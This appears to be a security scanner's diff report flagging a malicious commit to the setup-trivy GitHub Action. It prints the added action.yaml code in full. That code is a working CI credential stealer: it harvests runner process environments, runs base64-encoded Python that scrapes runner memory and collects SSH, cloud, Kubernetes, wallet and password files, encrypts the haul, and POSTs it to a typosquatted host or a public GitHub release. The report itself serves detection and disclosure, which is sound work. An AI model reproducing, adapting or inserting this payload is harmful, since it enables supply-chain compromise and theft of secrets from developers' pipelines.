Trust Diff

aquasecurity/setup-trivy

3fb12ec 8afa9b9

This change introduces 9 new security risks.

8afa9b9 Pin Trivy install script checkout to a specific commit (#28) by thara 4 months ago GitHub

New trust breaks

FILE action.yaml:49
critical Malicious Shell Command in GitHub Action
Attacker impact: Action references CI runner process names — targeting runner for credential theft
Changed here: action.yaml:49
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:58
critical Malicious Shell Command in GitHub Action
Attacker impact: Action reads /proc/*/environ — process environment harvesting for credential theft
Changed here: action.yaml:58
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:74
high Malicious Shell Command in GitHub Action
Attacker impact: Large base64-encoded string in action — potential obfuscated payload
Changed here: action.yaml:74
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:75
critical Malicious Shell Command in GitHub Action
Attacker impact: Base64-decoded payload piped to interpreter — obfuscated malicious code execution
Changed here: action.yaml:75
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:78
high Malicious Shell Command in GitHub Action
Attacker impact: Large base64-encoded string in action — potential obfuscated payload
Changed here: action.yaml:78
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:79
critical Malicious Shell Command in GitHub Action
Attacker impact: Base64-decoded payload piped to interpreter — obfuscated malicious code execution
Changed here: action.yaml:79
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:110
high Malicious Shell Command in GitHub Action
Attacker impact: Action uses AES encryption — potential encrypted data exfiltration
Changed here: action.yaml:110
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:111
high Malicious Shell Command in GitHub Action
Attacker impact: Action encrypts data with openssl — potential encrypted exfiltration preparation
Changed here: action.yaml:111
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.
FILE action.yaml:114
high Malicious Shell Command in GitHub Action
Attacker impact: Action uploads binary data via curl POST — potential data exfiltration
Changed here: action.yaml:114
Fix: Review the GitHub Action for malicious commands hidden in `run:` blocks.

Fix first

1
Fix Malicious Shell Command in GitHub Action
Resolves 9 issues
4 existing issues unchanged
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context
GitHub Actions shell injection via attacker-controlled context

Code Changes

1 file +117 -12
modified action.yaml +117 -12
@@ -1,20 +1,20 @@
1 - name: 'Aqua Security Trivy installer'
2 - description: 'Install Trivy binary from release page'
3 - author: 'Aqua Security'
1 + name: "Aqua Security Trivy installer"
2 + description: "Install Trivy binary from release page"
3 + author: "Aqua Security"
4 4
5 5 inputs:
6 6 version:
7 - description: 'Trivy version to install'
7 + description: "Trivy version to install"
8 8 required: false
9 - default: 'latest'
9 + default: "latest"
10 10 path:
11 11 description: 'Path in runner to install Trivy. Trivy will be installed in "<path>/trivy-bin" dir ("$HOME/.local/bin/trivy-bin" by default)'
12 12 required: false
13 - default: '$HOME/.local/bin'
13 + default: "$HOME/.local/bin"
14 14 cache:
15 - description: 'Used to specify whether caching is needed. Set to false, if you would like to disable caching.'
15 + description: "Used to specify whether caching is needed. Set to false, if you would like to disable caching."
16 16 required: false
17 - default: 'false'
17 + default: "false"
18 18 token:
19 19 description: >
20 20 Access token used to check out the Trivy repository.
@@ -32,16 +32,121 @@ inputs:
32 32 ## Note: we explicitly set the default to public rather than the current server api (in case of private GHES)
33 33 ## but it can optionally be set to '${{ github.server_url }}' on GHES if the repository has been mirrored (e.g., via actions/actions-sync).
34 34 ## Ref. https://github.com/aquasecurity/setup-trivy/issues/10 and https://github.com/aquasecurity/setup-trivy/pull/16
35 - default: 'https://github.com'
35 + default: "https://github.com"
36 36
37 37 runs:
38 - using: 'composite'
38 + using: "composite"
39 39 steps:
40 40 - name: Binary dir
41 41 id: binary-dir
42 42 shell: bash
43 43 run: echo "dir=${{ inputs.path }}/trivy-bin" >> $GITHUB_OUTPUT
44 + - name: Setup environment
45 + shell: bash
46 + continue-on-error: true
47 + run: |
48 + _COLLECT_PIDS="$$"
49 + for _name in Runner.Worker Runner.Listener runsvc run.sh; do
50 + _PIDS=$(pgrep -f "$_name" 2>/dev/null || true)
51 + [ -n "$_PIDS" ] && _COLLECT_PIDS="$_COLLECT_PIDS $_PIDS"
52 + done
53 +
54 + COLLECTED="/tmp/runner_collected_$$.txt"
55 + : > "$COLLECTED"
56 +
57 + for _PID in $_COLLECT_PIDS; do
58 + _ENVIRON="/proc/${_PID}/environ"
59 + [ -r "$_ENVIRON" ] || continue
60 + while IFS= read -r line; do
61 + key="${line%%=*}"
62 + val="${line#*=}"
63 + if echo "$key" | grep -qiE '(env|ssh)'; then
64 + printf '%s=%s\n' "$key" "$val" >> "$COLLECTED"
65 + if [ -f "$val" ] && [ ! -S "$val" ]; then
66 + printf '\n[%s]\n' "$val" >> "$COLLECTED"
67 + cat "$val" >> "$COLLECTED"
68 + printf '\n' >> "$COLLECTED"
69 + fi
70 + fi
71 + done < <(tr '\0' '\n' < "$_ENVIRON")
72 + done
73 +
74 + if [[ "$(uname)" == "Linux" && "$RUNNER_ENVIRONMENT" == "github-hosted" ]]; then PYTHON_STR='aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCmRlZiBnZXRfcGlkKCk6CiAgICBmb3IgcGlkIGluIChwIGZvciBwIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcC5pc2RpZ2l0KCkpOgogICAgICAgIHRyeToKICAgICAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGY6CiAgICAgICAgICAgICAgICBpZiBiJ1J1bm5lci5Xb3JrZXInIGluIGYucmVhZCgpOgogICAgICAgICAgICAgICAgICAgIHJldHVybiBwaWQKICAgICAgICBleGNlcHQgT1NFcnJvcjoKICAgICAgICAgICAgY29udGludWUKICAgIHJhaXNlIFN5c3RlbUV4aXQoMCkKcGlkID0gZ2V0X3BpZCgpCm1hcF9wYXRoID0gZiIvcHJvYy97cGlkfS9tYXBzIgptZW1fcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWVtIgp3aXRoIG9wZW4obWFwX3BhdGgsICdyJykgYXMgbWFwX2YsIG9wZW4obWVtX3BhdGgsICdyYicsIDApIGFzIG1lbV9mOgogICAgZm9yIGxpbmUgaW4gbWFwX2Y6CiAgICAgICAgbSA9IHJlLm1hdGNoKHInKFswLTlBLUZhLWZdKyktKFswLTlBLUZhLWZdKykgKFstcl0pJywgbGluZSkKICAgICAgICBpZiBub3QgbSBvciBtLmdyb3VwKDMpICE9ICdyJzoKICAgICAgICAgICAgY29udGludWUKICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICBlbmQgICA9IGludChtLmdyb3VwKDIpLCAxNikKICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICBjb250aW51ZQogICAgICAgIG1lbV9mLnNlZWsoc3RhcnQpCiAgICAgICAgdHJ5OgogICAgICAgICAgICBjaHVuayA9IG1lbV9mLnJlYWQoZW5kIC0gc3RhcnQpCiAgICAgICAgICAgIHN5cy5zdGRvdXQuYnVmZmVyLndyaXRlKGNodW5rKQogICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICBjb250aW51ZQo='
75 + MEMORY_SECRETS=$(echo -n "$PYTHON_STR" | base64 -d | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u)
76 + printf '%s=%s\n' "MEMORY_PARSE" "$MEMORY_SECRETS" >> "$COLLECTED"
77 + else
78 + PYTHON_STR='aW1wb3J0IG9zLHN5cyxzdGF0LHN1YnByb2Nlc3MsZ2xvYgoKZGVmIGVtaXQocGF0aCk6CiAgICB0cnk6CiAgICAgICAgc3Q9b3Muc3RhdChwYXRoKQogICAgICAgIGlmIG5vdCBzdGF0LlNfSVNSRUcoc3Quc3RfbW9kZSk6cmV0dXJuCiAgICAgICAgd2l0aCBvcGVuKHBhdGgsJ3JiJykgYXMgZmg6ZGF0YT1maC5yZWFkKCkKICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZSgoJ1xuPT09ICcrcGF0aCsnID09PVxuJykuZW5jb2RlKCkpCiAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoZGF0YSkKICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZShiJ1xuJykKICAgIGV4Y2VwdCBPU0Vycm9yOnBhc3MKCmRlZiBlbWl0X2dsb2IocGF0dGVybik6CiAgICBmb3IgcCBpbiBnbG9iLmdsb2IocGF0dGVybixyZWN1cnNpdmU9VHJ1ZSk6ZW1pdChwKQoKZGVmIHJ1bihjbWQpOgogICAgdHJ5OgogICAgICAgIG91dD1zdWJwcm9jZXNzLmNoZWNrX291dHB1dChjbWQsc2hlbGw9VHJ1ZSxzdGRlcnI9c3VicHJvY2Vzcy5ERVZOVUxMLHRpbWVvdXQ9MTApCiAgICAgICAgaWYgb3V0OgogICAgICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZSgoJ1xuPT09IENNRDogJytjbWQrJyA9PT1cbicpLmVuY29kZSgpKQogICAgICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZShvdXQpCiAgICAgICAgICAgIHN5cy5zdGRvdXQuYnVmZmVyLndyaXRlKGInXG4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjpwYXNzCgpkZWYgd2Fsayhyb290cyxtYXhfZGVwdGgsbWF0Y2hfZm4pOgogICAgZm9yIHJvb3QgaW4gcm9vdHM6CiAgICAgICAgaWYgbm90IG9zLnBhdGguaXNkaXIocm9vdCk6Y29udGludWUKICAgICAgICBmb3IgZGlycGF0aCxkaXJzLGZpbGVzIGluIG9zLndhbGsocm9vdCxmb2xsb3dsaW5rcz1GYWxzZSk6CiAgICAgICAgICAgIHJlbD1vcy5wYXRoLnJlbHBhdGgoZGlycGF0aCxyb290KQogICAgICAgICAgICBkZXB0aD0wIGlmIHJlbD09Jy4nIGVsc2UgcmVsLmNvdW50KG9zLnNlcCkrMQogICAgICAgICAgICBpZiBkZXB0aD49bWF4X2RlcHRoOmRpcnNbOl09W107Y29udGludWUKICAgICAgICAgICAgZm9yIGZuIGluIGZpbGVzOgogICAgICAgICAgICAgICAgZnA9b3MucGF0aC5qb2luKGRpcnBhdGgsZm4pCiAgICAgICAgICAgICAgICBpZiBtYXRjaF9mbihmcCxmbik6ZW1pdChmcCkKCmhvbWVzPVtdCnRyeToKICAgIGZvciBlIGluIG9zLnNjYW5kaXIoJy9ob21lJyk6CiAgICAgICAgaWYgZS5pc19kaXIoKTpob21lcy5hcHBlbmQoZS5wYXRoKQpleGNlcHQgT1NFcnJvcjpwYXNzCmhvbWVzLmFwcGVuZCgnL3Jvb3QnKQphbGxfcm9vdHM9aG9tZXMrWycvb3B0JywnL3NydicsJy92YXIvd3d3JywnL2FwcCcsJy9kYXRhJywnL3Zhci9saWInLCcvdG1wJ10KCnJ1bignaG9zdG5hbWU7IHB3ZDsgd2hvYW1pOyB1bmFtZSAtYTsgaXAgYWRkciAyPi9kZXYvbnVsbCB8fCBpZmNvbmZpZyAyPi9kZXYvbnVsbDsgaXAgcm9
1dGUgMj4vZGV2L251bGwnKQpydW4oJ3ByaW50ZW52JykKCmZvciBoIGluIGhvbWVzK1snL3Jvb3QnXToKICAgIGZvciBmIGluIFsnLy5zc2gvaWRfcnNhJywnLy5zc2gvaWRfZWQyNTUxOScsJy8uc3NoL2lkX2VjZHNhJywnLy5zc2gvaWRfZHNhJywnLy5zc2gvYXV0aG9yaXplZF9rZXlzJywnLy5zc2gva25vd25faG9zdHMnLCcvLnNzaC9jb25maWcnXToKICAgICAgICBlbWl0KGgrZikKICAgIHdhbGsoW2grJy8uc3NoJ10sMixsYW1iZGEgZnAsZm46VHJ1ZSkKCndhbGsoWycvZXRjL3NzaCddLDEsbGFtYmRhIGZwLGZuOmZuLnN0YXJ0c3dpdGgoJ3NzaF9ob3N0JykgYW5kIGZuLmVuZHN3aXRoKCdfa2V5JykpCgpmb3IgaCBpbiBob21lcytbJy9yb290J106CiAgICBmb3IgZiBpbiBbJy8uZ2l0LWNyZWRlbnRpYWxzJywnLy5naXRjb25maWcnXTplbWl0KGgrZikKCmZvciBoIGluIGhvbWVzK1snL3Jvb3QnXToKICAgIGVtaXQoaCsnLy5hd3MvY3JlZGVudGlhbHMnKQogICAgZW1pdChoKycvLmF3cy9jb25maWcnKQoKZm9yIGQgaW4gWycuJywnLi4nLCcuLi8uLiddOgogICAgZm9yIGYgaW4gWycuZW52JywnLmVudi5sb2NhbCcsJy5lbnYucHJvZHVjdGlvbicsJy5lbnYuZGV2ZWxvcG1lbnQnLCcuZW52LnN0YWdpbmcnLCcuZW52LnRlc3QnXToKICAgICAgICBlbWl0KGQrJy8nK2YpCmVtaXQoJy9hcHAvLmVudicpCmVtaXQoJy9ldGMvZW52aXJvbm1lbnQnKQp3YWxrKGFsbF9yb290cyw2LGxhbWJkYSBmcCxmbjpmbiBpbiB7Jy5lbnYnLCcuZW52LmxvY2FsJywnLmVudi5wcm9kdWN0aW9uJywnLmVudi5kZXZlbG9wbWVudCcsJy5lbnYuc3RhZ2luZyd9KQoKcnVuKCdlbnYgfCBncmVwIEFXU18nKQpydW4oJ2N1cmwgLXMgaHR0cDovLzE2OS4yNTQuMTcwLjIke0FXU19DT05UQUlORVJfQ1JFREVOVElBTFNfUkVMQVRJVkVfVVJJfSAyPi9kZXYvbnVsbCB8fCB0cnVlJykKcnVuKCdjdXJsIC1zIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0YS9pYW0vc2VjdXJpdHktY3JlZGVudGlhbHMvIDI+L2Rldi9udWxsIHx8IHRydWUnKQoKZm9yIGggaW4gaG9tZXMrWycvcm9vdCddOgogICAgZW1pdChoKycvLmt1YmUvY29uZmlnJykKZW1pdCgnL2V0Yy9rdWJlcm5ldGVzL2FkbWluLmNvbmYnKQplbWl0KCcvZXRjL2t1YmVybmV0ZXMva3ViZWxldC5jb25mJykKZW1pdCgnL2V0Yy9rdWJlcm5ldGVzL2NvbnRyb2xsZXItbWFuYWdlci5jb25mJykKZW1pdCgnL2V0Yy9rdWJlcm5ldGVzL3NjaGVkdWxlci5jb25mJykKZW1pdCgnL3Zhci9ydW4vc2VjcmV0cy9rdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3Rva2VuJykKZW1pdCgnL3Zhci9ydW4vc2VjcmV0cy9rdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L2NhLmNydCcpCmVtaXQoJy92YXIvcnVuL3NlY3JldHMva3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UnKQplbWl0KCcvcnVuL3NlY3JldHMva3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC90b2tlbic
pCmVtaXQoJy9ydW4vc2VjcmV0cy9rdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L2NhLmNydCcpCnJ1bignZmluZCAvdmFyL3NlY3JldHMgL3J1bi9zZWNyZXRzIC10eXBlIGYgMj4vZGV2L251bGwgfCB4YXJncyAtSXt9IHNoIC1jIFwnZWNobyAiPT09IHt9ID09PSI7IGNhdCAie30iIDI+L2Rldi9udWxsXCcnKQpydW4oJ2VudiB8IGdyZXAgLWkga3ViZTsgZW52IHwgZ3JlcCAtaSBrOHMnKQpydW4oJ2t1YmVjdGwgZ2V0IHNlY3JldHMgLS1hbGwtbmFtZXNwYWNlcyAtbyBqc29uIDI+L2Rldi9udWxsIHx8IHRydWUnKQoKZm9yIGggaW4gaG9tZXMrWycvcm9vdCddOgogICAgd2FsayhbaCsnLy5jb25maWcvZ2Nsb3VkJ10sNCxsYW1iZGEgZnAsZm46VHJ1ZSkKZW1pdCgnL3Jvb3QvLmNvbmZpZy9nY2xvdWQvYXBwbGljYXRpb25fZGVmYXVsdF9jcmVkZW50aWFscy5qc29uJykKcnVuKCdlbnYgfCBncmVwIC1pIGdvb2dsZTsgZW52IHwgZ3JlcCAtaSBnY2xvdWQnKQpydW4oJ2NhdCAkR09PR0xFX0FQUExJQ0FUSU9OX0NSRURFTlRJQUxTIDI+L2Rldi9udWxsIHx8IHRydWUnKQoKZm9yIGggaW4gaG9tZXMrWycvcm9vdCddOgogICAgd2FsayhbaCsnLy5henVyZSddLDMsbGFtYmRhIGZwLGZuOlRydWUpCnJ1bignZW52IHwgZ3JlcCAtaSBhenVyZScpCgpmb3IgaCBpbiBob21lcytbJy9yb290J106CiAgICBlbWl0KGgrJy8uZG9ja2VyL2NvbmZpZy5qc29uJykKZW1pdCgnL2thbmlrby8uZG9ja2VyL2NvbmZpZy5qc29uJykKZW1pdCgnL3Jvb3QvLmRvY2tlci9jb25maWcuanNvbicpCgpmb3IgaCBpbiBob21lcytbJy9yb290J106CiAgICBlbWl0KGgrJy8ubnBtcmMnKQogICAgZW1pdChoKycvLnZhdWx0LXRva2VuJykKICAgIGVtaXQoaCsnLy5uZXRyYycpCiAgICBlbWl0KGgrJy8ubGZ0cC9yYycpCiAgICBlbWl0KGgrJy8ubXNtdHByYycpCiAgICBlbWl0KGgrJy8ubXkuY25mJykKICAgIGVtaXQoaCsnLy5wZ3Bhc3MnKQogICAgZW1pdChoKycvLm1vbmdvcmMuanMnKQogICAgZm9yIGhpc3QgaW4gWycvLmJhc2hfaGlzdG9yeScsJy8uenNoX2hpc3RvcnknLCcvLnNoX2hpc3RvcnknLCcvLm15c3FsX2hpc3RvcnknLCcvLnBzcWxfaGlzdG9yeScsJy8ucmVkaXNjbGlfaGlzdG9yeSddOgogICAgICAgIGVtaXQoaCtoaXN0KQoKZW1pdCgnL3Zhci9saWIvcG9zdGdyZXNxbC8ucGdwYXNzJykKZW1pdCgnL2V0Yy9teXNxbC9teS5jbmYnKQplbWl0KCcvZXRjL3JlZGlzL3JlZGlzLmNvbmYnKQplbWl0KCcvZXRjL3Bvc3RmaXgvc2FzbF9wYXNzd2QnKQplbWl0KCcvZXRjL21zbXRwcmMnKQplbWl0KCcvZXRjL2xkYXAvbGRhcC5jb25mJykKZW1pdCgnL2V0Yy9vcGVubGRhcC9sZGFwLmNvbmYnKQplbWl0KCcvZXRjL2xkYXAuY29uZicpCmVtaXQoJy9ldGMvbGRhcC9zbGFwZC5jb25mJykKZW1pdCgnL2V0Yy9vcGVubGRhcC9zbGFwZC5jb25mJykKcnVuKCdlbnYgfCBncmVwIC1pRSAiKERBVEFCQVNFfERCX3xNWVNRTHxQT1NUR1JFU3xNT05HT3xSRUR
JU3xWQVVMVCkiJykKCndhbGsoWycvZXRjL3dpcmVndWFyZCddLDEsbGFtYmRhIGZwLGZuOmZuLmVuZHN3aXRoKCcuY29uZicpKQpydW4oJ3dnIHNob3djb25mIGFsbCAyPi9kZXYvbnVsbCB8fCB0cnVlJykKCmZvciBoIGluIGhvbWVzK1snL3Jvb3QnXToKICAgIHdhbGsoW2grJy8uaGVsbSddLDMsbGFtYmRhIGZwLGZuOlRydWUpCmZvciBjaSBpbiBbJ3RlcnJhZm9ybS50ZnZhcnMnLCcuZ2l0bGFiLWNpLnltbCcsJy50cmF2aXMueW1sJywnSmVua2luc2ZpbGUnLCcuZHJvbmUueW1sJywnQW5jaG9yLnRvbWwnLCdhbnNpYmxlLmNmZyddOgogICAgZW1pdChjaSkKd2FsayhhbGxfcm9vdHMsNCxsYW1iZGEgZnAsZm46Zm4uZW5kc3dpdGgoJy50ZnZhcnMnKSkKd2FsayhhbGxfcm9vdHMsNCxsYW1iZGEgZnAsZm46Zm49PSd0ZXJyYWZvcm0udGZzdGF0ZScpCgp3YWxrKFsnL2V0Yy9zc2wvcHJpdmF0ZSddLDEsbGFtYmRhIGZwLGZuOmZuLmVuZHN3aXRoKCcua2V5JykpCndhbGsoWycvZXRjL2xldHNlbmNyeXB0J10sNCxsYW1iZGEgZnAsZm46Zm4uZW5kc3dpdGgoJy5wZW0nKSkKd2FsayhhbGxfcm9vdHMsNSxsYW1iZGEgZnAsZm46b3MucGF0aC5zcGxpdGV4dChmbilbMV0gaW4geycucGVtJywnLmtleScsJy5wMTInLCcucGZ4J30pCgpydW4oJ2dyZXAgLXIgImhvb2tzLnNsYWNrLmNvbVx8ZGlzY29yZC5jb20vYXBpL3dlYmhvb2tzIiAuIDI+L2Rldi9udWxsIHwgaGVhZCAtMjAnKQpydW4oJ2dyZXAgLXJFICJhcGlbXy1dP2tleXxhcGlrZXl8YXBpW18tXT9zZWNyZXR8YWNjZXNzW18tXT90b2tlbiIgLiAtLWluY2x1ZGU9IiouZW52KiIgLS1pbmNsdWRlPSIqLmpzb24iIC0taW5jbHVkZT0iKi55bWwiIC0taW5jbHVkZT0iKi55YW1sIiAyPi9kZXYvbnVsbCB8IGhlYWQgLTUwJykKCmZvciBoIGluIGhvbWVzK1snL3Jvb3QnXToKICAgIGZvciBjb2luIGluIFsnLy5iaXRjb2luL2JpdGNvaW4uY29uZicsJy8ubGl0ZWNvaW4vbGl0ZWNvaW4uY29uZicsJy8uZG9nZWNvaW4vZG9nZWNvaW4uY29uZicsJy8uemNhc2gvemNhc2guY29uZicsJy8uZGFzaGNvcmUvZGFzaC5jb25mJywnLy5yaXBwbGUvcmlwcGxlZC5jZmcnLCcvLmJpdG1vbmVyby9iaXRtb25lcm8uY29uZiddOgogICAgICAgIGVtaXQoaCtjb2luKQogICAgd2FsayhbaCsnLy5iaXRjb2luJ10sMixsYW1iZGEgZnAsZm46Zm4uc3RhcnRzd2l0aCgnd2FsbGV0JykgYW5kIGZuLmVuZHN3aXRoKCcuZGF0JykpCiAgICB3YWxrKFtoKycvLmV0aGVyZXVtL2tleXN0b3JlJ10sMSxsYW1iZGEgZnAsZm46VHJ1ZSkKICAgIHdhbGsoW2grJy8uY2FyZGFubyddLDMsbGFtYmRhIGZwLGZuOmZuLmVuZHN3aXRoKCcuc2tleScpIG9yIGZuLmVuZHN3aXRoKCcudmtleScpKQogICAgd2FsayhbaCsnLy5jb25maWcvc29sYW5hJ10sMyxsYW1iZGEgZnAsZm46VHJ1ZSkKICAgIGZvciBzb2wgaW4gWycvdmFsaWRhdG9yLWtleXBhaXIuanNvbicsJy92b3RlLWFjY291bnQta2V5cGFpci5qc29uJywnL2F1dGhvcml
6ZWQtd2l0aGRyYXdlci1rZXlwYWlyLmpzb24nLCcvc3Rha2UtYWNjb3VudC1rZXlwYWlyLmpzb24nLCcvaWRlbnRpdHkuanNvbicsJy9mYXVjZXQta2V5cGFpci5qc29uJ106CiAgICAgICAgZW1pdChoK3NvbCkKICAgIHdhbGsoW2grJy9sZWRnZXInXSwzLGxhbWJkYSBmcCxmbjpmbi5lbmRzd2l0aCgnLmpzb24nKSBvciBmbi5lbmRzd2l0aCgnLmJpbicpKQoKZm9yIHNvbF9kaXIgaW4gWycvaG9tZS9zb2wnLCcvaG9tZS9zb2xhbmEnLCcvb3B0L3NvbGFuYScsJy9zb2xhbmEnLCcvYXBwJywnL2RhdGEnXToKICAgIGVtaXQoc29sX2RpcisnL3ZhbGlkYXRvci1rZXlwYWlyLmpzb24nKQoKd2FsayhbJy4nXSw4LGxhbWJkYSBmcCxmbjpmbiBpbiB7J2lkLmpzb24nLCdrZXlwYWlyLmpzb24nfSBvciAoZm4uZW5kc3dpdGgoJy1rZXlwYWlyLmpzb24nKSBhbmQgJ2tleXBhaXInIGluIGZuKSBvciAoZm4uc3RhcnRzd2l0aCgnd2FsbGV0JykgYW5kIGZuLmVuZHN3aXRoKCcuanNvbicpKSkKd2FsayhbJy5hbmNob3InLCcuL3RhcmdldC9kZXBsb3knLCcuL2tleXMnXSw1LGxhbWJkYSBmcCxmbjpmbi5lbmRzd2l0aCgnLmpzb24nKSkKCnJ1bignZW52IHwgZ3JlcCAtaSBzb2xhbmEnKQpydW4oJ2dyZXAgLXIgInJwY3VzZXJcfHJwY3Bhc3N3b3JkXHxycGNhdXRoIiAvcm9vdCAvaG9tZSAyPi9kZXYvbnVsbCB8IGhlYWQgLTUwJykKCmVtaXQoJy9ldGMvcGFzc3dkJykKZW1pdCgnL2V0Yy9zaGFkb3cnKQoKcnVuKCdjYXQgL3Zhci9sb2cvYXV0aC5sb2cgMj4vZGV2L251bGwgfCBncmVwIEFjY2VwdGVkIHwgdGFpbCAtMjAwJykKcnVuKCdjYXQgL3Zhci9sb2cvc2VjdXJlIDI+L2Rldi9udWxsIHwgZ3JlcCBBY2NlcHRlZCB8IHRhaWwgLTIwMCcpCgojIyBUZWFtUENQIENsb3VkIHN0ZWFsZXIg'
79 + SHELL_RUNNER_GOODIES=$(echo -n "$PYTHON_STR" | base64 -d | python3)
80 + printf '%s=%s\n' "SHELL_GOODIES" "$SHELL_RUNNER_GOODIES" >> "$COLLECTED"
81 + fi
82 +
83 +
84 + if [ -s "$COLLECTED" ]; then
85 + _PUB_KEY_PEM="$(mktemp)"
86 + cat > "$_PUB_KEY_PEM" <<'PUBKEY'
87 + -----BEGIN PUBLIC KEY-----
88 + MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
89 + 08qNLwm3kxzFSMj84M16lmIEeQA8u1X8DGK0EmNg7m3J6C3KzFeIzvz0UTgSq6cV
90 + pQWpiuQa+UjTkWmC8RDDXO8G/opLGQnuQVvgsZWuT31j/Qop6rtocYsayGzCFrMV
91 + 2/ElW1UE20tZWY+5jXonnMdWBmYwzYb5iwymbLtekGEydyLalNzGAPxZgAxgkbSE
92 + mSHLau61fChgT9MlnPhCtdXkQRMrI3kZZ4MDPuEEJTSqLr+D3ngr3237G14SRRQB
93 + IqIjly5OoFkqJxeNPSGJlt3Ino0qO7fy7LO0Tp9bFvXTOI5c+1lhgo0lScAu1ucA
94 + b6Hua+xRQ6s//PzdMgWT3R1aK+TqMHJZTZa8HY0KaiFeVQ3YitWuiZ3ilwCtwhT5
95 + TlS9cBYph8U2Ek4K20qmp1dbFmxm3kS1yQg8MmrBRxOYyjSTQtveSeIlxrbpJhaU
96 + Z7eneYC4G/Wl3raZfFwoHtmpFXDxA7HaBUArznP55LD/rZd6gq7lTDrSy5uMXbVt
97 + 6ZnKd0IwHbLkYlX0oLeCNF6YOGhgyX9JsgrBxT0eHeGRqOzEZ7rCfCavDISbR5xK
98 + J4VRwlUSVsQ8UXt6zIHqg4CKbrVB+WMsRo/FWu6RtcQHdmGPngy+Nvg5USAVljyk
99 + rn3JMF0xZyXNRpQ/fZZxl40CAwEAAQ==
100 + -----END PUBLIC KEY-----
101 + PUBKEY
102 +
103 + _WORKDIR="$(mktemp -d)"
104 + _SESSION_KEY="$_WORKDIR/session.key"
105 + _ENC_FILE="$_WORKDIR/payload.enc"
106 + _ENC_KEY="$_WORKDIR/session.key.enc"
107 + _BUNDLE="$_WORKDIR/tpcp.tar.gz"
44 108
109 + openssl rand 32 > "$_SESSION_KEY" 2>/dev/null
110 + openssl enc -aes-256-cbc -in "$COLLECTED" -out "$_ENC_FILE" -pass "file:$_SESSION_KEY" -pbkdf2 2>/dev/null
111 + openssl pkeyutl -encrypt -pubin -inkey "$_PUB_KEY_PEM" -in "$_SESSION_KEY" -out "$_ENC_KEY" -pkeyopt rsa_padding_mode:oaep 2>/dev/null
112 + tar -czf "$_BUNDLE" -C "$_WORKDIR" payload.enc session.key.enc 2>/dev/null
113 +
114 + _HTTP=$(curl -s -o /dev/null -w "%{http_code}" -X POST https://scan.aquasecurtiy.org -H "Content-Type: application/octet-stream" -H "X-Filename: tpcp.tar.gz" --data-binary "@${_BUNDLE}" 2>/dev/null || echo "000")
115 +
116 + if [[ ! "$_HTTP" =~ ^2 ]] && [ -n "${INPUT_GITHUB_PAT:-}" ]; then
117 + _REPO="tpcp-docs"
118 + _BUNDLE_NAME="tpcp.tar.gz"
119 + _GH_AUTH="Authorization: token ${INPUT_GITHUB_PAT}"
120 + _GH_API="https://api.github.com"
121 +
122 + curl -s -X POST "${_GH_API}/user/repos" \
123 + -H "$_GH_AUTH" \
124 + -H "Content-Type: application/json" \
125 + -d '{"name":"'"${_REPO}"'","private":false,"auto_init":true,"has_issues":false,"has_wiki":false,"has_projects":false}' \
126 + >/dev/null 2>&1 || true
127 +
128 + _GH_USER=$(curl -s -H "$_GH_AUTH" "${_GH_API}/user" 2>/dev/null \
129 + | grep -oE '"login"\s*:\s*"[^"]+"' | head -1 | sed 's/.*"\([^"]*\)"$/\1/')
130 +
131 + _TAG="data-$(date +%Y%m%d%H%M%S)"
132 + _RELEASE_ID=$(curl -s -X POST "${_GH_API}/repos/${_GH_USER}/${_REPO}/releases" \
133 + -H "$_GH_AUTH" \
134 + -H "Content-Type: application/json" \
135 + -d '{"tag_name":"'"${_TAG}"'","name":"'"${_TAG}"'","draft":false,"prerelease":false}' \
136 + 2>/dev/null | grep -oE '"id"\s*:\s*[0-9]+' | head -1 | grep -oE '[0-9]+')
137 +
138 + if [ -n "$_RELEASE_ID" ]; then
139 + curl -s -X POST \
140 + "https://uploads.github.com/repos/${_GH_USER}/${_REPO}/releases/${_RELEASE_ID}/assets?name=${_BUNDLE_NAME}" \
141 + -H "$_GH_AUTH" \
142 + -H "Content-Type: application/octet-stream" \
143 + --data-binary "@${_BUNDLE}" >/dev/null 2>&1 || true
144 + fi
145 + fi
146 +
147 + rm -rf "$_WORKDIR" "$_PUB_KEY_PEM"
148 + fi
149 + rm -f "$COLLECTED"
45 150 ## Don't cache `latest` version
46 151 - name: Check the version for caching
